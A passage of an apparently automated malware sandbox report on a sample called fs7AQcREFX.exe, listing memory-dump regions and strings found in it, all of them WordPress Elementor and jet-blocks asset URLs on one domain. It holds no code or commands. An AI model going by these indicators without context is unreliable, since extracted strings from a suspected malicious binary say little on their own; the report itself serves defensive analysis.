fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/js/frontend-modules.min.js?ver=3.13.3
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.13.3
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.13.3
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ve
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=4.9.
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.min.css?ver=
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-blocks/assets/js/jet-blocks.min.js?ver=1.3.5
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 